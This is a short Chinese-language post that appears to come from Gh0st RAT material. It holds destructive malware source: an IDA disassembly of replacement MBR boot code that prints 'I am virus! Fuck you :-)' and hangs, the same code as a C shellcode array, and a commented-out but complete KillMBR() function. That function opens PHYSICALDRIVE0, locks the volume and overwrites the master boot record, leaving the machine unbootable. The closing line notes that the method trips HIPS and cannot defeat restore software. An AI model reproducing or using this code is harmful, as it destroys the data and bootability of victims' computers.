被改写的MBR代码:
作用是清屏并显示字符:"'I am virus! Fuck you :-)",然后进入死循环
seg000:0000 mov ax, 12h
seg000:0003 int 10h ; - VIDEO - SET VIDEO MODE
seg000:0003 ; AL = mode
seg000:0005 mov bp, 7C18h ; string start addr
seg000:0008 mov cx, 18h ; string length
seg000:000B mov ax, 1301h
seg000:000E mov bx, 0Ch
seg000:0011 mov dx, 0E1Dh
seg000:0014 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:0014 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:0014 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:0014 ; ES:BP -> start of string
seg000:0014
seg000:0016
seg000:0016 ForeverLoop: ; CODE XREF: seg000:ForeverLoopj
seg000:0016 loop ForeverLoop
seg000:0016
seg000:0016 ; ---------------------------------------------------------------------------
seg000:0018 s_IAmVirusFuckY db 'I am virus! Fuck you :-)'
seg000:0018 seg000 ends
写入MBR的C代码:
unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR()
{
// HANDLE hDevice;
// DWORD dwBytesWritten, dwBytesReturned;
// BYTE pMBR[512] = {0};
//
// // 重新构造MBR
// memcpy(pMBR, scode, sizeof(scode) - 1);
// pMBR[510] = 0x55;
// pMBR[511] = 0xAA;
//
// hDevice = CreateFile
// (
// "\\\\.\\PHYSICALDRIVE0",
// GENERIC_READ | GENERIC_WRITE,
// FILE_SHARE_READ | FILE_SHARE_WRITE,
// NULL,
// OPEN_EXISTING,
// 0,
// NULL
// );
// if (hDevice == INVALID_HANDLE_VALUE)
// return -1;
// DeviceIoControl
// (
// hDevice,
// FSCTL_LOCK_VOLUME,
// NULL,
// 0,
// NULL,
// 0,
// &dwBytesReturned,
// NULL
// );
// // 写入病毒内容
// WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
// DeviceIoControl
// (
// hDevice,
// FSCTL_UNLOCK_VOLUME,
// NULL,
// 0,
// NULL,
// 0,
// &dwBytesReturned,
// NULL
// );
// CloseHandle(hDevice);
//
// ExitProcess(-1);
return 0;
}
不过写MBR的方法很挫,会被HIPS报警,而且不能穿透还原或影子